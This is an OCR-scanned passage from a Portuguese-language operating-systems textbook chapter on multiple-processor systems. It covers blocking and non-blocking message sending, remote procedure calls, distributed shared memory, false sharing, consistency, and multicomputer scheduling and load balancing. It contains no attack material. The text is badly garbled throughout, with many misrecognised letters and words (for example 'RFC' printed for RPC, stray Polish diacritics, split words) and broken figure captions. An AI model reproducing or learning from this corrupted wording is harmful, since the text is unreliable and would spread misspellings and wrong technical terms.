gem desse esquema e que o processo emissor pode con- 
tinuar a computaęao em paralelo com a transmissao da 
mensagem, cm vez de a CPU ter dc ticar ociosa (supon- 
do que nenhum outro processo possa ser executado). A 
escolha enlre pdmilivas bloąueantes e nao bloąueantes 
normalnienie e feita pelos projetistas do sistema (isto e r 
ou uma ou outra primitiva hca disponfvel), embora em 
alguns sistemas ambas sejam disponweis e os usuarios 
possam escofhcr suas favoritas. 

Gontu do, a vantagem no desempenho oferecida pe- 
las primitivas nao bloąueantes e contrabaianęada por uma 
desvantagem seria: o emissor nao pode modificar o buffer 
da mensagem antes que esta tenha sido enviada* As con- 
seąuencias do processo de sobrescrever a mensagem du- 
ranle a transmissao sao hornveis demais para serem con- 
templadas. Piór ainda, o processo emissor nao tem ideia 
de ąuando a transmissao e feita, de modo quc de nimca 
sabe ąuando e seguro reusar o buffer, Difidlmente ele 
podera evitar toca-lo para sempre. 
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I Figura S.T9 (a) Urna chamada send bloqijeante. (b) Uma chamada send nao bloqueante. 


Exisicm ues safdas possweis. A primeira soluęao e h- 
zcr com que o nucleo copk a mensagem para urn buffer 
interno ao nucleo e en tao permiiir que o processo eon li¬ 
mie, como mosira a Figura 8.19(b). Do porno de vista do 
emissor, esse esąucina e o mesmo ątie o de uma cha mada 
bioąueante: assim quc de obliver o conlroJe de volta, es- 
tara livre para reutilizar o buffer, Obvia menie, a mensa¬ 
gem airnia nao tera sido enviada, mas o emissor nao esiara 
impedido por causa disso* A desvantagem desse metodo e 
que cada mensagem dc sarda deve ser copiada do espaęo 
do usuario para o espaęo do nucleo, Com muilas inicrfaces 
de redo, a mensagem tera de ser posteriomienie copiada 
para urn buffer de transmissao do hardware de ąualąuer 
maneira, de modo que a primeira cópia e essendalmcnte 
desperdięada. A cópia adicional pode reduzir consideravel- 
mente o desempenho do sistona. 

A segunda soluęao e imerromper o emissor quando 
a mensagem foi emiada para informa-lo de que o buffer 
esta novamente dispomvel. Nenhuma cópia e necessaria 
nesse caso, econormzando tempo, mas as interrupęoes no 
nfvd dc usuario tornam a programaęao complicada, dificil 
c sujcita a condięoes dc corrida, sendo improdutiva c quasc 
impossfvd de depurar, 

A terceira soluęao e utilizar o buffer com um esquema 
de cópia na escrita, islo e, marca udo-o como sendo somente 
łeitura ate que a mensagem tenha sido enviada. Se o buffer 
e reutilizado antes do envio da mensagem, e fdta uma có¬ 
pia* O próbie ma com essa soluęao e que, a menos que o bu¬ 
ffer esteja isolado em sua própria pagina, as escritas para as 
variaveis próximas lambem foręarao uma cópia. A.lem dis- 
so, sera necessaria uma administraęao extra porque a aęao 
de enviar urna mensagem nesse easo afera implicUameme o 
siatus leitura/escriia da pagina. Por firn, mais cedo ou mals 


lardc a pagina sera provavelmenie recscrita dc novo, geran- 
do uma cópia que pode nao ser mais necessaria. 

Assim, as escolhas do lado do emissor sao; 

K Endo bioąueante (a CPU fica ociosa durante a 
transmissao de mensagem). 

2. Envio nao bioąueante com cópia (icmpo da CPU 
desperdięado para cópia exira). 

3. Envio nao bioąueante com imerrupęao (toina a 
programaęao dificil). 

4. Cópia na escrita (uma cópia extra eventualmente e 

necessaria). 

Em condięoes nor mais, a primeira escolha e a nielhor, 
espedalmeme quando multiplos threads esiao disponn eis, 
pois, nesse caso, enquanto um thread esia bloąueado ten- 
lando enviar, ouiros threads podem continuar trabalhan- 
do. Essa tecnica lambem nao requerque nenhum buffer do 
ntkleo seja gerendado. Aj cm disso, como se pode verificar 
comparando a Figura S.I9(a) com a Figura 8.19(b), a men¬ 
sagem em geral sera ermada mais rapidamente se nao for 
necessaria nenhuma cópia. 

Para deixar regisirado, gosiariamos de informar que al- 
guns a mores u sam um criierio difereme para distinguir pri- 
mitivas sfneronas dc assureronas. Em uma visao ahernaliva, 
uma chamada e sfnerona somente se o emissor e bloąueado 
ate que a mensagem seja recebida e uma confirmaęao seja 
eiwiada de volta (Andrews, 1991). No mundo da comu- 
nicaęao em tempo real, sineronismo tein ainda um outro 
significado, que infelizmcnte pode causar confusao. 

Assim como a primitiva $end r a primiiiva rmm tam- 
bem pode ser bioąueante ou nao bloqueante. Uma chama¬ 
da bloqueanie simplesrneme suspende o chamador ate que 
chegue uma mensagem. Se multiplos threads esiao dis po- 
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mveis, essa e uma abordagem simples. Ahernativamente, 
urna recem na o bloqueanle simplesmente diz ao nucleo 
onde o buffer esta e o comrole e re tornado quase que dc 
imediato. Oma interrupęao pode ser nsada para avisar que 
lima mensagem chegou. No entanto, as intcrrupęocs sao 
dificcis dc programar c tambćm muito lentas, c, por isso, 
pode ser prcferivd ao receptor testar continua men te por 
mensagens quc ebegam usando um procedimento, puli, 
que informa sc cxisie alguma mcnsagem esperando, Em 
caso afirmativo, o chamador pode chama rpetjnessage, que 
retorna a primeira mensagem que chegou. Em algims sis- 
te mas, o compilador pode inserir diamadas poi! no cod i go, 
em locais apropriados, ernbora sabendo que muitas vezes 
esse comando e enganador. 

Outra opęao ainda e um esąuema no qual a chcgada 
de u ma mensagem cria um novo thread espontaneamen- 
Łe no espaęo de endereęamento do processo receptor. Esse 
thread e chamado de thread pop-up. Ele execiua um 
procedi niemo predeterminado cujo para metro e um pon- 
teiro para a mensagem que ehega. Após o processamento 
da mensagem, de termina e e desirufdo automaticamente. 

Urna variame dessa ideia consiste em executar o código 
do receptor diretamente no manipulador de imernipęao, 
sem a preocupaęao de criar um thread pop-up. Para tomar 
esse esquema ainda mais rapido, a própria mensagem deve 
conter o endereęo do manipulador, dc modo que, quando 
urna mensagem e recebida, o manipulador pode ser cha- 
mado em poucas instrnęoes. A grandę vantageni nesse caso 
ć que nenhuma cópia se faz necessaria, O tratador pega a 
mensagem da płaca dc mterfacc c a proccssa. Esse esquema 
ć chamado dc mensagens ativas (Von Eicken et aL, 1992). 
Visto quc cada mensagem conteni o endereęo do manipula- 
doi, as mensagens ativas só trabalham ąuando os cinissores 
e receptores eonfiam compłetamente um no outro, 

8.2.41 chamada de procedimento remoto 

Ernbora o moddo de troca dc mensagem forncęa inna 
maneira conveniente de estnunrar um sistema operacio- 
nal de mułticomputador, cle sofre de urna falha incnravel; 


o paradigma basico em torno do qual loda comunicaęao 
quc e constnuda e cntrada/safda. Os proce di me ni ós semi e 
mem estao funda me ntalmente empenhados em fazer en- 
trada/salda e muitas pessoas a cred! tam que E/S e o rnodelo 
errado de program a ęa o. 

Esse probkma e conhecido ha muito tempo, mas pou- 
co foi fcito para resolvć-lo ale que um arligo escrito por 
Birrell e Nelson (1984) inlroduziu urna sduęao rampie- 
ta menie diferente. Ernbora a idda seja bastante simples 
(depois que alguein ja pensou nda), as implicaęóes muitas 
vezes sao sutis. Nesta seęao, exa mi na rem os o conceito, sua 
implementaęao, suas loręase suas fraąuezas* 

Para resumir, o que Birrell e Nd son sugeriram foi per- 
mitir que os programas fossem capazes dc chaniar procedi- 
mentos localizados em outras CPUs. Ouando um processo 
na maąuina I chama um procedimento na maquina 2, o 
processo chamador e suspenso e a cxecuęao do procedi- 
mento chamado ocorrc na maquina 2, A informa ęao pode 
ser iransportada do chamador para o chamado nos para- 
metros c pode voltar no resuttado do procedimento. Ne¬ 
nhuma troca de mensagem ou E/S c visivcl ao programa- 
dor. Essa tćcnica c conhecida como RFC (remate procedurę 
cali — chamada dc procedimento remoto) c tern servido 
dc base a muitos soflwarcs para multiconiputador. Tradi- 
cionalmente, o procedimento chamador e conhecido como 
clieme c o procedimento chamado e denominado scrvidor; 
usaremos esses nomes aqui tambem, 

A ideia cm torno dc RFC ć fazer com quc urna chama¬ 
da dc um procedimento remoto seja tao parecida quanto 
pos$ivd com urna chamada a um procedimento locaL Em 
sua forma mais simples, para chamar um procedimento 
remoto, o programn dientc deve ser ligado a um pcque- 
no procedimento dc bibiiotcca chamado stub do cl len te, 
o qnal representa o procedimento scrvidor no espaęo dc 
endereęamento do clicntc. Da mesma maneira, o servidor 
e ligado a um procedimento chamado stub do servidor. 
Esscs proccdimcmos cscondcm o fato dc urna chamada de 
procedimento do clieme para o servidor nao ser local. 

Os passos reais na realizaęao de urna RPC sao mostra- 
dos na Figura 8,20. O passo i mostra o clieme chamando 


CPU do clieme 


CPU do servidor 




Rede 


i Figura 8.20 Passos na realizaęao de urna chamada de procedimento remoto. Os etubs estSo pintados de cinza ( 

























Sn#W66G 


Capitulo B Sistemas com multiplos processadores 347 


o stub do cliente. Trata-se de urna chamada de procedi- 
mento local, com os parametros colocados na pil ha de um 
modo convendonal. O passo 2 mostra o stub do cliente 
empacotando os parametros cm urna mensagem e fazcndo 
uma chamada dc sistema para cnviar a mensagem. O cm- 
pacotamcnto dos parametros c chamado dc marshaling 
(prepataęao). O passo 3 mostra o mleko erwiando uma 
mensagem da maąuina cliente para a maąuina scrvidora. 
O passo 4 mostra o mleko passando o pacote recebido para 
o stub doservidor [que normalnienie teria chamado a pri- 
miiiva recem). Por fim, o passo 5 mostra o smb do servidor 
chamando o procedimemo servidor. A resposta segue o 
niesrno caminho na direęao oposta. 

A qucstao principal a ser notada aqui c que o procc- 
dimento cliente- escrito pelo usuario, apenas faz unia cha¬ 
mada norma! de procedimemo (isto e, local) para o stub do 
cliente, o qual tern o mesmo noine do procedimemo ser- 
vidor. Yisio que o procedimemo cliente e o stub do cliente 
estao no mesmo espaęo de endereęamento, os parametros 
sao passados no modo usual. Da mesma maneira, o proce- 
dimento servidor e chamado por uma rotina em scu espaęo 
de endereęamento com os parametros adeąuados. Para o 
procedimemo scrvidor, rudo c usual Assim r em vcz dc fa- 
zer E/S usando send c metie, a coniimicaęao remota c fcita 
camu(lando uma chamada normal de rotina. 

Questoes de implemenłaęao 

Apesar da elegancia conceimal de RFC existem alguiis 
aspectos traięoeiros. Um dos princtpais e o uso de parame¬ 
tros do lipo ponteiro. Normal me me, passa r um ponteiro 
para um procedimento nao constitui probienia. O procedi- 
mento chamado pode usar o ponteiro da mesma maneira 
que o cha ma doi, pois os dois proccdimemos residem no 
mesmo espaęo de endereęamento virtua3. Com RFC a pas- 
sagem de pontdros e impossfrel, pois o cliente e o servidor 
estao em espaęos de endereęamento diferenies. 

Hm alguns casos, cert os truques podcm ser usados para 
possibilitar a passagem dc ponteiros. Suponha quc o pri- 
meiro parametru seja um ponteiro para um inteiro, k. O 
stub do cliente pode preparar o próprio k e envia-Io ao ser- 
vidor. Entao, o stub do servidor cna um ponteiro para k e 
passa-o para a rotina do scrvidor, assim como cle espcrava t 
Quando a rotina do senddor retomar o controlc para o stub 
do servidor, este ermara A'de volta para o cliente, em que o 
novo A sera copiado sobre o velho, caso lenha sitlo alterado 
pelo servidor. Em decorrencia disso, a seąuencia-padrao da 
chamada por referenda foi trocada por cópia-restauraęao. 
Infelizmentc, esse tmque nem sempre funriona — por 
exemplo, ąuando o ponteiro apoma para um grafo ou ou- 
tra estrutura de dados complexa. For essa razao, algumas 
restrięóes devem ser impostas nos parametros para as roti- 
nas chamadas remota menie. 

U m segimdo problema e que em linguagcns f raca men¬ 
ie lipificadas, como C, e perfeiiamente legał escrever uma 
rotina que calcule o prodiuo interno de dois arranjos (ar- 


rays) sem especificar o tamanho desses vetores. Gada um 
poderia ser terminado por um valor especial conhecido so- 
mente pelas rotinas chamador e chamado. Nessas circuns- 
tancias, e essenciaimente impossfvel para o stitb do cliente 
preparar os parametros: ele nao tern como determinar o 
tamanho dos veiores. 

Um terceiro problema e que nem sempre e posswel 
deduzir os lipos dos parametros, mesmo a partir de uma 
cspccificaęao formal ou do próprio código. Um exemplo e 
o comando printf, que pode ter qualquer numero de pata- 
metros {no mfninio um), que, por sua vcz, podcm ser unia 
mistura arbitraria dc intciros, curlos, longos, caractcrcs, 
cadcias de cara eter cs, niiineros em porno flutuantc de ta- 
manhos variados e outros lipos. Tentar chamar printfeomo 
um procedimento remoto seria praiicamente impossfrd 
porąue C e rnuito permissivo. Contudo, nao seria nada po¬ 
pular uma regra qite cstabelccesse que a RFC piukssc ser 
usada desde que nao fosse programada em C (ou C++)- 

Um quarto problema esta no uso de variaveis globais, 
Normalmente, as rotinas chamador e chamado podem se 
comunicar usando variaveis globais, aiem de parametros. 
Se o procedimento chamado se mover en tao para uma ma- 
quina remota, o código falhara, pois as vartaveis globais 
nao sera o mais compartilhadas. 

Esscs problemas nao impiicam a falta dc esperanęa 
para RFC. Na verdadc, cla c ampla nieme usada, mas algu- 
mas restrięóes e ccrlos cuidados s ( io ncccssdrios para fazc- 
-la trabalhar bem na pratica. 

8.2,51 Memória compartilhada dislribuida 

Embora a RFC ten ha suas atraęoes, muitos progra ma- 
dores ainda preferem um modelo de memória compartilha¬ 
da e gostariam de usa-la mesmo em multicomputadores. 
Surpreendememcrue H ć possivel preservar razoave)mentc 
bem a ilusao de memória compartilhada, mesmo quando 
da de fato nao existe, usando a tecnica chamada de DSM 
(distrihuted shared niemoty —■ memória compariilliada dis- 
tribtifda) (Li, 1986; Li e Hudak, 1989). Com DSM, cada 
pagina e localizada em uma das memórias da Figura 8.1. 
Cada maąuina tern sua própria memória virtual e suas pró- 
prias tabelas de paginas. Quando uma CPU faz um LOAD ou 
STORĘ em uma pagina que da nao tern, ocorrc um desvio 
para o sistema operacionaL Entao, este localiza a referida 
pagina, pede a CPU proprietaria atual que a remova de scu 
mapeamento local e emia a pagina b CPU solicitante por 
meio da rede de interconexao. Quando chega, a pagina e 
mapeada na CPU solicitante e a instruęao falta nie e reini- 
ciada. Na verdade, o sistema operacional esta simplesmente 
atendendo as faltas de pagina a partir de unia RAM remota 
em vez do disco local. Para o usuario, a maąuina parece ter 
memó ria compa rti 1 ha d a. 

Na Figura 8.21, ć possfrd observar a difercnęa entre 
uma memória reaimente compartilhada e uma DSM. Na Fi¬ 
gura 8.21 (a), vemos um muhiprocessador verdadelro com 
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Memória com partii bada 
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Memória compariilhada 
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Maquina 2 
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Sistema de 
execuęio 
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Hardware 


Memória compadilhada 

(c) 


Figura 8.21 Diversas camadas nas quais a memória compartilhada pode ser impiementada. (a) No hardware, {b) No sistema 
operacional. (c) No nivel do usuario. 


memória fisica compartilhada impiementada pdo hardwa¬ 
re* Na Figura 8*21 (b), ha urna DSM, impiementada pdo sis- 
lema operacional* Na Figura 8*21 (c), ve-$e ainda mitro mo¬ 
delu de memória compartilhada, implememado por outros 
nfvds de software. Voliaremos a essa terceira opęao pos- 
leriormente; por enąuamo, concemra-nos-emos em DSM. 

Yejamos com deialhcs como a DSM trabalha* Hm urn 
sistema DSM, o espaęo de endereęa menie e dMdido em 
paginas, qnc sao distribufdas por todos os nos do sistema. 
Quando urna CPU referenda urn endereęo quc nao ć local, 
ocorre um desvio e o software DSM busca a pagina eon¬ 
ie ndo o endereęo e rcinicia a instmęao faltante, que pode, 
cmao, ser eomplctada com sucesso* Esse conceiio ć ilust rado 
na Figura 8*22(a) para um espaęo de endereęanicnto com 16 
paginas e ąuatro nos, cada um capaz de reterscis paginas* 

Nesse exemplo, se a CPU 0 referenda insiruęoes ou da- 
dos nas paginas 0, 2, 5 ou 9, as rderencias sao feitas local- 
mente. Referencias a ouiras paginas causam interrupęóes. 
Por exemplo, u ma referenda a um endereęo na pagina 10 
causara um desvio para o software DSM, que, enlao, mo- 
vera a pagina 10 do nó 1 para o no 0, como mosira a Figura 
8.22 (b)* 

Replicaęao 

Urna md hora no sistema basico eapaz de aumentar 
consideravdmcmc o desempenho e a replicaęao das pa¬ 


ginas do tipo somente lei tura — como o código do progi a- 
ma, as constantcs ou o u tras estruturas dc dados quc es ta o 
disponfvds somente para leitura. Por exemplo, sc a pagina 
10 da Figura 8,22 ć urna seęao de código de um próg rama, 
seu Lisa pela CPU 0 pode resuhar em urna cópia sendo en- 
viada para a CPU 0 sem que a pagina original na memória 
da CPU 1 seja pert u i bada, como mosira a Figura 8*22 (c)* 
Assim, as CPUs 0 e 1 po dem ambas referenciar a pagina 10 
ta mas vezes quamas for nccessario sem causa r Uuerrup- 
ęóes para buscar a memória (altanie. 

Outra possibilidade e replicar nao só as paginas do tipo 
somente leitura, mas todas as paginas. Enąuanto as leirn- 
ras estao sendo feitas, nao existe efetivamente nenhuma 
diferenęa entre a replicaęao de urna pagina somente leitura 
e a replicaęao de urna pagina do tipo leilura-cscrita* Gontu- 
do, se urna pagina replicada e modificada rcpentinamente, 
uma aęao especial dcve ser tornada para prevenir o aparc- 
cimento de multiplas cópias inconsistentes, A prevcnęao da 
inconsistencia sera tema de discussao nas seęóes seguintes* 

Falso compartilhamento 

Os sistemas DSM sao similares aos multiprocessado- 
res em certas caractensticas-chave. Em ambos os sistemas, 
quando uma pałavra de memória nao local e referendada, 
um pedaęo dc memória eon ten do a palavra e buscado de 
sua localizaęcio real e coloeado na matjuina que fez a re- 
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Memoria virtual compartilhacła globatmente constituEda de 16 paginas 



Memoria 


(a) 


Rade 



(c) 


I Figura 8.22 (a) PAginas do espaęo de endereęamento distribuidas entre quatro maquinas. (b) Siiuaę&o após a CPU 0 referenclar a 
pagina 10 e esta pagina ser movida para la. {o) Situagao se a pagina 10 e do tipo somente leitura e a repficagao e osada. 


ferenda (memoria principa! ou cache, respectivamenie). 
Urna ąuestao importante de projeto e: guao grandę esie 
pedaęo deve ser? Nos mulriprocessadores, o tamanho do 
bloco da ca che geralmente e de 32 ou 64 bytes, para evitar 
prender o barramemo com unia transmissao muito longa. 
Nos sistemas DSM, a unidade deve ser um miiltiplo do ta- 
manho da pagina (pois a MMU trabalha com paginas}, po- 
dendo ser 1, 2 t 4 ou mais paginas. Conseąuentemente, e 
como se estivessemos simulantfo paginas maiores. 

Existem vamagens e desvantagens no uso de tamanhos 
grandes de pagina para DSM. A maior vantagem e que, 
em razao de o tempo de iniciatizaęao para urna transferen- 
da de rede ser bastante Longo, para transferir 4.096 bytes 
nao e neccssario muito mais tempo do quc para transferir 


L024 bytes. Assim, transferir dados em unidades grandes, 
ąuando unia parte significaltva do espaęo de endereęamen¬ 
to e movida, pode, em muitos casos, reduzir o nu mero de 
tran sfer encias. Essa propriedade e espedalmeme im por¬ 
ta me porque muitos programas apresentam localidade de 
referenda, o que significa que, se um pro gra ma referenda 
uma palavra de urna pagina, de provavelmmte referen¬ 
da ra outras pa!avras da mesma pagina no futuro próximo. 

Por outro lado, durante uma grandę transferem da r a 
rede permanece presa por mais tempo bloąueando outras 
faltas causadas por outras processos. Alem disso, um tama¬ 
nho de pagina muito grandę introduz um novo problema, 
cha mado de falso eonipartilhamento, iiustrado na Figu¬ 
ra 8,23. Ncsse exemplo, temos uma pagina contendo duas 


CPU 1 CPU 2 



1 Figura 8,23 Falso compartilhamento de uma pagina contendo duas variaveis nao relacionadas. 
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variaveis compartilhadas nao reladonadas, A e B. O pro- 
cessador 1 usa A de maneira mtensiva r lendo e escrevendo 
nde. Da mesma maneira, o processador 2 usa B freąuemc- 
mente. Nessas dramstandas, a pagina que eon rem ambas 
as variaveis estara constantemcnte indo e vindo entre as 
du as maąuinas. 

O problema nesse caso e que r embora as variaveis nao 
scjam reladonadas, clas aparccem addenta!menie junlas 
na mesma pagina, de modo que o processo que usa urna 
delas tambem obtem a outra. Quanto maior for o ta ma n ho 
efetivo da pagina, ocorrerao mnito mais falsos compartHha- 
mentos c, dc modo oposto, quamo me nor for o tamanho 
efetivo da pagina, menos trequemememe des ocorrerao. 
Os sistemas eonnms de memória virtual nao apresentam 
nada analogo a esse fenómeno. 

Compiladores inteligentem que compreendem o próbie- 
ma e colocam as variavcis cm espaęos de endereęamemo 
adequados podem ajudara reduziro falso compartilhamen- 
to e melb ora r o desempenho, Contudo, falar e mais faci! do 
que fazer. Alem disso, se o falso compartilhamento implica 
qne o nó 1 use um elemento de om vetor e o no 2 utilize urn 
elememo dlferenie do mesmo vetor, mesmo um compiiador 
mteligente pouco podera fazer para resoher o problema. 

Obtendo consistencia seąuencial 

Sc as paginas que podem ser cscritas nao sao replica- 
das, a ąuestao da consistencia nao interessa, Existc cxala- 
mente urna eópia de cada pagina desse lipo, a qual e mo- 
vida de volta e adiante dinamicamente quando necessario. 
visto que nem sempre e possfvel sabei antecipada mente 
quais paginas podem serescritas, em muitos sistemas DSM, 
qnando um processo tema ler uma pagina remota, unia 
eópia local e feita e as duas cópias, local e remota, sao mar- 
cadas em suas respectivas MMUs como sendo do tipo so- 
mente leitura. Enąuantotodas as referenci as sao de leitura, 
ludo esta hem. 

Contudo, se qualquer processo tema escrever em urna 
pagina replicada, surge um problema de consistencia em 
potencial, pois alterar uma eópia e dcixar as outras Inal- 
leradas e maceitavel. Essa situaęao e analoga a q li da que 
ocorre em um multiprocessador quando unia CPU tenta 
niodificar uma palavra que esta presente em multiplas 
caches. A soluęao para a CPU que d esej a Inzer a escrita e 
primciro colocar um sina! no barramento sol i dla udo que 
todas as outras CPUs descartem suas cópias do referido bio- 
co da cachc. Sistemas DSM gerahneme traballiam da mes- 
ma maneira, Aaitcs que inna pagina compa nil bada possa 
ser escrita, uma meusagem e enviada para todas as outras 
CPUs que detem inna eópia da mesma pagina solicitando 
que das removam o mapeamento e descartem a pagina. 
Após todas elas terem respondido que o mapeamento foi 
desfeito, a CPU original pode finalmente fazer a escrita. 

Tambem e pos$ivd tolerar multiplas cópias das paginas, 
que podem ser cscritas medianie eircunstancias euidadosa- 
mente restritas. Uma maneira de fazer isso e permitir que 


um proccsso adquira uma variavel de travamento sobre a 
parte do espaęo de endereęamemo virtual e depois execute 
multiplas opcraęocs de leitura e escrita na memória tra- 
vada. No memento em que o travaniento for liberado, as 
alteraęoes poderao ser propagadas para as dc mais cópias. 
Enąuanto uma unica CPU puder impedir uma pagina em 
um da do momento, esse esąuema preservara consistencia. 

Por outro lado, quando uma pagina passwel de ser es¬ 
crita e realmeme escrita pela primeira vez, uma eópia limpa 
e feita e armazenada na CPU que esta realizando a escrita. 
Variaveis de travamento sobre a pagina podem ser adquiri- 
das, a pagina atualizada e as variaveis liberadas. Mais tai de. 
quando um proccsso em uma maquina remota lenta aclqui- 
rir uma variavel de travamemo sobre essa pagina, a CPU 
que escreveu nela anterionnente compa ra o esta do atuai da 
pagina eom a pagina iimp t i e constrói uma mensagem lis¬ 
ta udo todas as palavras que loraiti modiRcadas. Essa lista e, 
entao, enviada para a CPU rcqucremc para que ela atualize 
sua eópia em vcz de invalida-la (Keleher et al., 1994). 

8.2.61 Escalonamento em multicomputador 

Em um multiprocessador, todos os processos residem 
na mesma memória, Quando uma CPU fi na li za sua tarcia 
atuai, eia ]iega um proccsso e o executa. Em princfpio, in¬ 
dos os processos sao candidatos em potencial. Em um mul¬ 
ticomputador. a situaęao e totalmente diferenle. Cada nó 
tein sua própria memória e seu próprio conjunto de pro- 
eessos. A CPU i nao pode repeminameme decidir cxecu- 
tar um processo loealizado no nó 4 sem primeiro trabaihar 
bastante para oLite-lo. Essa diferenęa signihca que o esca- 
łona men to em multicomputadores c mais factl. embora a 
alocaęao dos processos nos nos seja mais importante. A se- 
guir, estudarernos essas questoes. 

O escalonamento em multicomputador e algo similar 
ao escalonamento em multiprocessador, mas nem todos 
os algoritmos do segundo se aplicam ao primeiro. O ab 
goritmo mais simples para multiprocessador — manier 
uma unica lisia centralizada de processos prontos — nao 
funciona. visto que cada processo pode somenre executar 
na CPU em que cle esta atualmente loealizado. Contudo, 
quando um novo processo e criado, uma escoiha pode ser 
feita sobre o local onde colocado — para balancear a car- 
ga. por exemplo. 

Uma vez que cada nó tem seus próprios processos, 
qualquer algoritmo de escalonamento local pode ser usa- 
do. Contudo, tambem e possivel usar o escalonamento em 
bando, visto que e necessario apenas um eniendimento ini- 
eial sobre qual processo executar e em qual tempo, alem de 
algum modo de coordenar o inido dos intervabs de tempo. 

8,2,71 Balanceamento de carga 

Existe relativameme pouco para dizer sobre o escaio- 
naincnto em mu I licom pu ta d ores, pois, uma vez quc um 
processo e assoriado a um nó, pode-se optar por qualquer 






Sn#w 


Capitulo 8 S istem a s com m u Iti ptos processad o res 3S1 


algoritmo de escalonamento local, a menos que o escalona- 
mento em bando esteja sendo usado. Gontu do, certamente 
porque existe pouco controle, uma vez que um processo e 
assodado a um nó, a decisao sobre qual processo deveria ir 
para qual nótoma-sc import a ntc. Isso contra sta com os sis- 
tcmas dc multiprocessadores, nos ąuais todos os proccssos 
vivem na nficsma memória c podcm ser cscalonados sobre 
qualqucr CPU de acordo com sua vontade. Conscquente- 
menie, e importante verificar como os proccssos podcm ser 
efetivamente associados aos nos. Os algoritmos e as heurfs- 
ticas para fazer essa associaęao sao conhecidos como algo¬ 
ritmos de alocaęao de processador. 

Muitos algoritmos dc alocaęao dc processador (isto e, 
nós) ja foram propostosao longo dos a nos. Hlcs difercm en- 
tre si no lipo de informaęao que se suptk conherida, bem 
como cm sens objęli vo$, As propriedades qiie podcm ser 
conhecidas soln e u ni processo induem as necessidades da 
CPU, o uso de memória e a quamidade de comunicaęao 
enire cada um dos ouiros proccssos. Entre os objęli vos pos- 
siveis estao a minimizaęao dos cidos de CPU desperdięados 
em razao da falta de traballio local, a minimizaęao da largu* 
ra de banda de comunicaęao lotal e a garamia de eąuidade 
para usuarios c processos. A seguir cxammarcrnos alguns 
algoritmos para dar uma ideia do quc c possivcL 

Algoritmo determimstico teórico de grafos 

Uma classe de algoritmos amplamente estudada e em- 
pregada em sistemas que conslstem de processos nos quais 
a CPU e as necessidades de memória sao conhecidas e exis- 
te uma matriz informando a quantidade media de trafego 
entre cada par de processos. Se o numeru de processos e 
maior do que o mi mero de CPUs, k, varios processos terao 
de ser associados a cada CPU. A ideia e executar uma as- 
sodaęao de modo que o trafego na rede seja niinimizado. 

O sistema pode ser represeniado como um grało com 
pesos, em que cada vertice representa um processo e cada 
arco representa um fluxo de mensagens entre dois pro¬ 
ccssos. Matematicarncme, o pro bierna se reduz a en eon- 
trar uma mancira de dividir (isto e, cortar) o graf o cm k 
subgrafos disjumos, sujeitos a certas restrięoes (por exem- 
plo, necessidades de CPU e de memória inferiores a al¬ 
guns limiles para cada subgrafo). Para cada soluęao que sc 


enquadra nas restrięoes, os arcos Iocalizados totalmente 
denlro de um unico subgrafo representam a comunicaęao 
intramaquina c podem ser ignorados. Os arcos que vao de 
um subgrafo para outro representam o trafego da rede. O 
objctivo e, entao, encontrar uma divisao quc minimize 
o trafego da rede c ao mesmo tempo satisfaęa todas as 
restrięoes. Como excmplo, a Figura 8.24 mostra um siste¬ 
ma de nove proccssos, de /lal com arcos roi u la dos com 
a carga dc coirmnicaęao media entre os processos (por 
exemplo, em Mbps). 

Na Figura 8.24(a), dividiinos um grafo com os proces¬ 
sos A, E c G no nó 1, os proccssos B t F e H no nó 2 e os pro¬ 
cessos C f Dc l no nó 3, O trafego lotal da rede c a soma dos 
arcos intersccionados pclos cortes (as linhas pontilhadas), 
islo e. 30 unidades. Na Figura 8.24(b), temos uma divisao 
difereme, que apresenta somenie 28 unidades dc trafego 
dc rede. Ao supor que essa divisIo de 28 unidades aienda 
a todas as restrięoes de memória e CPU, ela constitui a me- 
llior escolha, pois requer menos comumeaęao. 

Intuitivamcńte r o quc fazemos e olhar para os aglo- 
merados Forte menie acoplados (fluxo clevado dc trafego 
intragrupo), mas que interagem pouco com os outros aglo- 
merados (fiu ko reduzido de trafego intergrupo). Alguns 
dos primeiros ariigos a diseutir o probfema foram Chow e 
Abraham (1982), Lo (1984) e Stone e Bokhari (1978). 

Algoritmo heuristico distri bu ido inkiado pelo emissor 

Vamos agora comhecer alguns algoritmos distribmdos. 
Um algoritmo diz que um processo, ao ser criado, execuia 
no nó que o criou, a menos que este esteja sobrecarregado. 
A medida usada para comprovar a sobrecarga pode ser a 
ąuantidade de processos, a ąuantidade do conjimio lotal 
de trabalho ou alguma outra. Se o nó esta sobrecarregado, 
dc selcciona outro nó aleaioriamentc e pergunla qual e 
su a carga (usando a mesma metrica), Sc a carga do nó in- 
vestigado esta abaixo dc um limiar, o processo excedeme e, 
entao, cnviado para de (Hager et al., 1986). Do contrario, 
outra maquina ć escolhida para a iuvestigaęao. A procura 
na o segue ii ule liui da menie. Se nenhum nó adequado foi 
encontrado deniro de A leniaiiyas, o algoritmo term i na e o 
processo excedente exeaita na maąuina onde foi origina- 
do. A ideia e que os nós sobrecarregados ternem livrar-se 



I Figura 8.24 Duas maneiras de alocar nove processos em tr§s nós. 
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do excesso de trabalho, como mosira a Figura S.25(a), que 
demonstra obalanceamento de carga inidado pelo emissor. 

Hager et aL (1986) constririram lim modclo analitico 
dcsse algoritmo com base em filas, Usando esse moddo, 
verifieou-se que o algoritmo comporta-se bem e e e$tavel 
com uma ampla gama de parameiros, incluindo valores 
diferentes de li mi ar es, custos de transferenda e limite de 
sondagem. 

Apesar disso, deve-se obsernr que, sob condięoes de 
muito trabalho, todas as maąuinas constantemente vao 
sondar out ras maąuinas em vao, na ientativa de encontrar 
urna rnaąuina que esieja ąuerendo aceitar mais trabaliio. 
Poucos processos estarao excedentes, mas uma sobrecarga 
consideravel pode surgir na temativa de distribuMos. 

Algoritmo heuristico distribuido inidado pało receptor 

Um algoritmo complementar ao antenor — inidado 
por um emissor sobreoarregado — e um inidado por um re¬ 
ceptor com po u ca carga, como m ostra do na Figura 3.2 5(b), 
Com esse algoritmo, scmprc que um proeesso fmaliza, o 
sistema verifica se de dispoe de trabaliio suficiente, Em 
caso negativo, ele escollie alguma maąmna aleatoria nieme 
e solicita trabalho a ela. Se a rnaąuina escolhkla nao tein 
nada a oferecer, uma segunda e depois unia lerceira ma- 
quina sao iiwestigadas. Se nenhurn trabalho e encomrado 
dentro de N investigaęoes ł o nó para temporaria nieme de 
procurar, faz ąualąuer servięo qtic ele possa ter esperado 
e tema novamente ąuando o próximo processo acabar, Se 
nenhum trabalho es ta dispomvel a rnaąuina lica ociosa. 
Após algum intemilo fixo de tempo, o nó dispontvel reto- 
ma a sondagem novamenie. 

Uma vantagem desse algoritmo e qtie ele nao sobrecar- 
